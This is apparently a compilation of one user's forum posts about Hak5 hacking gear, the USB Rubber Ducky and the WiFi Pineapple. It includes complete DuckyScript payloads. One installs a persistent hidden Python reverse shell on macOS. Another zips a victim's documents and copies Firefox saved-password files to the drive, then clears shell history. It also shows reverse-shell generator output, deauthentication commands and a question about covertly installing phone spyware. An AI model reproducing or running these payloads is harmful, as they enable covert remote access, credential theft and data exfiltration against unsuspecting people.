[osx reverse shell payload ... undo?]

i just did:

apt-get remove netcat

apt-get install net cat

[osx reverse shell payload ... undo?]

I downloaded the osx reverse shell payload from: http://sunstudiophoto.com/ducky/

i turned on my vpn, got my external ip address, and plugin the ip address into the script

DELAY 3000

GUI SPACE

DELAY 500

STRING Utilities

DELAY 1000

ENTER

DELAY 1000

STRING terminal

GUI DOWNARROW

DELAY 3500

STRING cd ~

ENTER

STRING mkdir .OSXhelper

ENTER

STRING cd .OSXhelper

ENTER

STRING echo "python -c 'import socket,subprocess,os;

STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

STRING s.connect((\"192.168.0.13\",8888));

STRING os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > helper.sh

ENTER

STRING chmod +rwx helper.sh

ENTER

STRING launchctl submit -l yes -p ~/.OSXhelper/helper.sh

ENTER

STRING ./helper.sh&

ENTER

DELAY 500

STRING exit

ENTER

DELAY 500

GUI q

DELAY 500

GUI w

then i

netcat -l -p 8888

BAMMMM! EVERYTHING WORKS PERFECTLY!!!!

however (comma) afterwards (i went back in and deleted the .OSXhelper folder and .maintScript folder (from the other simple-ducky payload generator, closed terminal... and went to test another payload for osx.

when i typed again on kali terminal

netcat -l -p 8888

i get an error message:

"shell-init: error retrieving current directory: getcwd: cannot access parent directories: no such file or directory.

sh-3.2$"

how do I stop this from happening?

[network and karma configuration]

That's probably because of this....

https://forums.hak5.org/index.php?/topic/29875-connecting-mark-iv-disrupts-laptop-wifi-connect/?p=225827

YUP... exactly. Thanks again. Im gonna make that adjustment!

[setup for tactical bundle use]

Thank thesugarat! I wasn't thinking of you when i wrote my statement about attacking n00bs. I am actually grateful for you and others that offer assistance to even the most basic questions!

Thanks again!

Client mode is for extending the range

Karma is to see who is connecting to my AP

with Karma running, i start urlsnarf... I put it on wlan0 as that is where the traffic is.

It will show information, but then it seems my Internet gets an error and all connected devices no longer have Internet. Hmm...

[Strange Tethering Behavior]

My Pineapple Mk5 has been working flawlessly since I got it a week or so ago, until today. I have used my pineapple tethered to my android phone before without any problems. I was using it like this again today for about 15 minutes or maybe longer without a hitch when suddenly I lost connection to my phone. I checked my phone and it showed no device was connected. Shortly after this I unplugged my android phone and it gave me a message that stated, "Charging paused, voltage too high." It continued to do this without being plugged in until I left the battery out for 10+ minutes. I tried tethering to another phone and it said no device was connected.

I have tried tethering several times since then and no phone will show a connected device. I have rebooted, reset, and reflashed the pineapple without any change. Also, I always get that strange charging message after unplugging my phone from the pineapple (with 2 different batteries even).

Everything else seems to be working, just the USB port is giving me problems.

Has anyone else seen anything like this? I suspect something failed mechanically, but If anyone has any suggestions I'd love to read them.

Thanks!

What's your method for tethering your android? I cant seem to get mine to work as of yet.

[network and karma configuration]

It's working now... Kali was automatically connect to eth0 to mk5 which kept messing up my Internet on kali. Once i clicked on disconnect for eth0, everything worked perfectly.

[Back in the unemployed saddle again]

why don't you go and support the protestors in Venezuela! lol that can eat up some of your free time, and may be fun as well! lol

[network and karma configuration]

Connection Information - Disconnect

Connected.

wlan1     Link encap:Ethernet  HWaddr 00:98:27:44:DA:6C          inet addr:192.168.1.106  Bcast:192.168.1.255  Mask:255.255.255.0          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:4623 errors:0 dropped:44 overruns:0 frame:0          TX packets:3317 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000          RX bytes:4340952 (4.1 MiB)  TX bytes:491772 (480.2 KiB)wlan1     IEEE 802.11bg  ESSID:"SOMETHING2.4"          Mode:Managed  Frequency:2.462 GHz  Access Point: 55:AA:1B:D2:E1:13          Bit Rate=54 Mb/s   Tx-Power=27 dBm          RTS thr:off   Fragment thr:off          Encryption key:off          Power Management:off          Link Quality=70/70  Signal level=-34 dBm          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0          Tx excessive retries:0  Invalid misc:24   Missed beacon:0

and my Karma Configuration is:

SSID: ATTWIFI

persistant is check

I added my kali machine MAC to blacklist

SSID Black / White Listing - which mode to use? White or Black? or no difference

now for my question: When my other devices (iMac, iPad) connect to ATTWIFI, the iMac and iPad are not able to get online. They are able to connect to ATTWIFI, but not have internet access.

Can someone please point out my rookie mistake?

thanks!

[setup for tactical bundle use]

thank you for all of your responses to my very n00b questions. I am new to all of this and I am really eager to learn. I know there where suppose to be pineapple university videos, but not many where created. what is the best method to learn all of this from a basic point without being attacked for not knowing enough? I don't know all of what is possible ∴ i don't know all that I want to learn, which is why pineapple university would be great if it existed.

But for now, I would like to use the pineapple tactical bundle for whatever it was designed for. I mean, I have a pineapple, and a 3 day battery in an easy to carry bag! So what can I do with it?

I don't want to double post in different places, but the reason I purchased this was as a wifi extender with my yagi so I can get internet from my place while I sit by the pool. I know there is much more that can be done with this ( and I do want to learn as much of those as I can), but I need to start someplace.

[yagi + mark v + macbook pro running kali]

sorry again guys! i am way overthinking this... and looking at too much information such as https://d37wxxhohlp07s.cloudfront.net/s3_images/840679/SMA-RPSMA.png?1357662460

here is a pic of my yagi. it is showing rp-sma male (so I need rp-sma female) for the yagi side. and the pineapple is sma female so this needs to be sma male...

so thesugarat was right and I should of just not thought about it and got what he said weeks ago!

so I now finally understand the confusion i was having between sma and rp-sma male/female i was looking at the "wrong attachment" to determine male and female... this was like looking at hyenas and figuring out which one is the female! lol

[setup for tactical bundle use]

http://hakshop.myshopify.com/products/tactical-wifi-hacking-kit-holiday-promotion

in regards to all that is included in the tactical bundle, what is the best setup for the mk5 for out and about, in the field use?

what is the ultimate setup?

mdk3 for deauth? aircrack-ng? ettercap? i have been using this with ettercap on kali http://vimeo.com/77961423

what is the best setup for pineapple?

I don't want to use my laptop. I'd like to use either MyWi 6.0 from iPad 2 to usb tether internet to pineapple (if possible)

basically, how can i tether from iPad 2 with MyWi 6.0 (if possible)

and which OPKG's should I install?

or if i am completely off, then how should I do my setup using what is in the tactical bundle?

[[Payload] OSX thread. First reverse shell payload.]

Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY".

I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up.

The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done).

REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks
DELAY 2000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 1000
STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;
ENTER
GUI m

I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;)

I hope someone is enjoying these...

-Shark3y

Shark3y... these are amazing! do you have anything else? yours are the only that I can find for os x.

[whitelist mk5 for dummies, internet sharing os x and/or kali]

was able to connect with

wget http://wifipineapple.com/mk5/wp5.sh
chmod +x wp5.sh
sudo bash wp5.sh

[whitelist mk5 for dummies, internet sharing os x and/or kali]

ok all. i just spent all morning messing with the rubberducky that just showed up. Now I have been messing with the mk5 for over an hour.

1. how do I put myself on the whitelist so I don't do anything to myself?

2. I have my mbp kali using internet via wifi and mk5 connected to mbp kali via ethernet cable provided. I am able to get into Wifi Pineapple Management. I go to Pineapple Bar and Pineapple Bar: Available, however I am not connecting. And when I plug the mk5 into my wifi router and not into my mbp kali, then I can't access the 172.16.42.1 router.

3. is there a way to use MiWi 6.0 on iPad 2 to get USB tethering to pineapple mk5?

4. I have also attempted to connect my pineapple mk5 to my iMac. I went to System Preference/Sharing/Internet Sharing

Share your connection from: Wifi (as this is how i use internet on my iMac)

To computers using: Ethernet (i have the ethernet cable plugged into pineapple mk5.

I am able to go to http://172.16.42.1:1471/ but I am not able to see anything at "Pineapple Bar:Available"

I have solid lights blue, amber, green that only slightly flicker once every 2 seconds or so.

[simple-ducky error]

error:

Would you like to return to the main menu [y/n]? ConfigBase::load: Unable to open /root/.config/terminator/config ([Errno 2] No such file or directory: '/root/.config/terminator/config')
terminator 0.95

simple-ducky

5. Linux & OS X Payloads

1. OSX Reverse Shell

Launchctl autostart label?

yes

Where shall I send your shell?
192.168.1.100

What port will you be listening on? 4444

How long of a delay would like before starting?
Use Milliseconds (15000 ms = 15 sec) 7000

Would you like to use a US keyboard a different format [Enter=US|o=other]? us


Hak5 Duck Encoder 2.6

Loading File ..... [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete..... [ OK ]


Your payload has been created, its located in /usr/share/simple-ducky

Press any key to contiue

To catch your shell, use:
ncat -l 4444
Would you like me to setup a listener [y/n]? y

EEROR HERE:
Would you like to return to the main menu [y/n]? ConfigBase::load: Unable to open /root/.config/terminator/config ([Errno 2] No such file or directory: '/root/.config/terminator/config')
terminator 0.95

[just received usb rubber ducky and have my first errors]

solved... i had to push the button on the rubber ducky.

but how to make this happen without pushing the button

[just received usb rubber ducky and have my first errors]

i just thought to go inside of the inject.bin file on my sd card and see what is there with nano.

this is what nano is reporting:

^K^@^H^@^O^@^O^@^R^@,^@^Z^@^R^@^U^@^O^@^G^@(^@

[just received usb rubber ducky and have my first errors]

I am following

root@kali:/media# cd /media
root@kali:/media# ls
A87B-A154 cdrom cdrom0
root@kali:/media# cd A87B-A154/
root@kali:/media/A87B-A154# ls
encoder.jar helloworld.txt inject.bin
root@kali:/media/A87B-A154# java -jar encoder.jar
Hak5 Duck Encoder 2.6.3

Usage: duckencode -i [file ..] encode specified file
or: duckencode -i [file ..] -o [file ..] encode to specified file

Arguments:
-i [file ..] Input File
-o [file ..] Output File
-l [file ..] Keyboard Layout (us/fr/pt or a path to a properties file)

Script Commands:
ALT [key name] (ex: ALT F4, ALT SPACE)
CTRL | CONTROL [key name] (ex: CTRL ESC)
CTRL-ALT [key name] (ex: CTRL-ALT DEL)
CTRL-SHIFT [key name] (ex: CTRL-SHIFT ESC)
DEFAULT_DELAY | DEFAULTDELAY [Time in millisecond * 10] (change the delay between each command)
DELAY [Time in millisecond * 10] (used to overide temporary the default delay)
GUI | WINDOWS [key name] (ex: GUI r, GUI l)
REM [anything] (used to comment your code, no obligation :) )
ALT-SHIFT (swap language)
SHIFT [key name] (ex: SHIFT DEL)
STRING [any character of your layout]
REPEAT [Number] (Repeat last instruction N times)
[key name] (anything in the keyboard.properties)
root@kali:/media/A87B-A154# nano helloworld.txt

  GNU nano 2.2.6                           File: helloworld.txt                                                            



REM Author: me

REM descriptions hellow world

STRING hello world

ENTER

I do not have windows computers. I have all mac and my one mbp running kali.

i opened leafpad and put my sd card into rubber ducky, connected it to kali machine, i have the blinking green lights, but nothing is happening

root@kali:/media/A87B-A154# ls

encoder.jar  helloworld.txt  inject.bin

root@kali:/media/A87B-A154# leafpad helloworld.txt

root@kali:/media/A87B-A154# nautilus .

root@kali:/media/A87B-A154# ls

encoder.jar  helloworld.txt  inject.bin

root@kali:/media/A87B-A154# java -jar encoder.jar  -i helloworld.txt -o /media/A87B-A154/inject.bin

Hak5 Duck Encoder 2.6.3



Loading File .....        [ OK ]

Loading Keyboard File .....    [ OK ]

Loading Language File .....    [ OK ]

Loading DuckyScript .....    [ OK ]

DuckyScript Complete.....    [ OK ]



root@kali:/media/A87B-A154#

[Please get this thing out of my life]

wait... you hate war criminals? why? IT'S WAR!!! There are not suppose to be rules in war.

but on the other hand, I do know how frusterating it can be when you contact a company about an issue and they don't respond... not that I have had that issue with this company, and believe me, I have emailed them some shit and received responses! lol

[[Support] WiFi Deauth]

mdk3 mon0 d -w <filename>

d -w is for whitelist file of all MAC that are allowed to access

[Open source mobile spy deployed with ducky]

There several sites like http://www.mobile-spy.com/android.html

That are all offering the same services for a fee. Is there an open source version that can be used with rubber ducky to install on an android phone or any device?

This would be great for a company that wants to install this on their company mobile devices.

[DuckToolkit NG]

No sorry, only Windows systems with admin priveledges that have PowerShell installed. What OS are you interested in running it against?

411.

os x

[DuckToolkit NG]

Am I to understand that this can be used for any os?

[Pineapple Mark V Gallery Show Off: Dec 13 2013 - Updated main post!]

They built a Kali image for this thing... I just need to find power requirements/consumption somewhere. (at work on my phone right now)

http://utilite-computer.com/web/home

Heck if that Pro model works well enough, I would get rid of my old core i5 Dell I use for Kali/Mint.

Anyone using this? If so, how is it? Whats your setup?

[Pineapple Mark V Gallery Show Off: Dec 13 2013 - Updated main post!]

VIDEO series comming this Christmas (Operation Takedown)

feat.The Elite Commander with antenna gear

i will start making videos of long range testing of the Elite Commander later this week or next week, depending if all the parts has arrived.

i will gather a team of victims deployed over a large geographical area, (pc,cell phones,tabs, etc)

Alot of equipment is being shipped to me from sunhans, different antennas (yagi,grid,omni), cables, connectors,boosters etc.

I hope i can add videos to this thread as well mrgray?

Is this video series out yet?